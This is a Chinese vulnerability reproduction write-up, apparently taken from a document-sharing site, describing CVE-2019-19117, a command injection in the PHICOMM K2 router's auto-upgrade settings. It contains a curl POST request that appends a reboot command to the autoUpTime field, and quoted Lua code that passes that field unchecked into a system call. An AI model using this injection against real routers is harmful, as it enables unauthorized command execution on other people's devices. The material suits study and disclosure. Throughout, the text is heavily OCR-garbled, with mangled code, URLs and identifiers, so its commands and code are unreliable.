《(CVE-2019-19117)PHICOMM 远程代码执行.docx》由会员分享,可在线阅读,更多相关《(CVE-2019-19117)PHICOMM 远程代码执行.docx(2页珍藏版)》请在第一文库网上搜索。
1、(CVE-2019-19117)PHICoMM远程代码执行一、漏洞简介通过修改HTTPPOSt请求中的内容,在根Shen上远程执行命令。二、漏洞影响PHIC0MMK2(PSG1218)V22.5.9.163三、复现过程受影响的源代码文件:usr1ib1ua1uciCOntroIIeiadminautoupgrade.1ua受影响的函数:SaVe()漏洞详情首先,在通过Web登录身份验证,会话劫持漏洞或弱凭据破解攻击以获取访问权限后,向设备发送精心制作的数据包cur1-i-s-k-v-XPOST-e,http:/192.168.2.1cgi-bin1uci;stok=xxxxxxxxxxx-bs
2、ysauth=4a2c4bdba5fb1273ce62759fd42dba42-data-binarymode=1&autoUpTime=02%3A051reboothttp:/192.168.2.1/cgi-bin/1uci/;stok=xxadminxxxxx,在此http数据包中,我们将要执行“重新引导”的命令添加到数据包内容中。Jj%qnq,i$(#WanCheCkmodaI).moda1(show);$(N#autoUpTimeM)va1($(#uptImehourN)va1():$(M#uptimeminM).va1();SetTimeout(fnction()document.s
3、ave.submit();,1O);我们可以看到,将autoUpTime,的值直接分配给变量,而无需检查该值是否被恶意修改,然后发送给服务器。functionsve()1oca1time=1uci.http.forRva1ue(,autoUpTtRe)1oca1nodeIuct.http.forRva1ue(node)1oca1upgrading=1ifnode=*1then1uct.sys.c11(uctsetsytteR.autoupgrade.up.ttne%s%tine)Iuct.sys.ca11(Muctsetsysten.autoupgrade.uptype6(a)1uct.sys
4、.ca11(NuctC0Rttsystem,)SChedu1etask.settaskatr(systenrHautoupgradeM,w1tbautoupgrade.sh9yesM,m16,uptine,)SChedu1etask.cfgscdutskby1a(,add,*/system*/(autoupgrdde,)e1setfnode=then1uct.sys.ca11(Nuctsetsysten.utouprde.up-type1)1uct.sys.ca11(,uctCoRnttsyste,t)Schedu1etask.cfgscdutskby1ua(de1,/systen/,utoupgrde)end1uci.http.redtrect(Iuct.dispatcher.but1daurICadntnM,nore_syssetM/autoupradeM),(node=Rde,upgradingupgrading)end然后,服务器直接将数据附加到命令,而无需检查数据是否也被恶意修改,从而使攻击者想要执行的命令附加到该命令。最后,路由器将执行命令reboot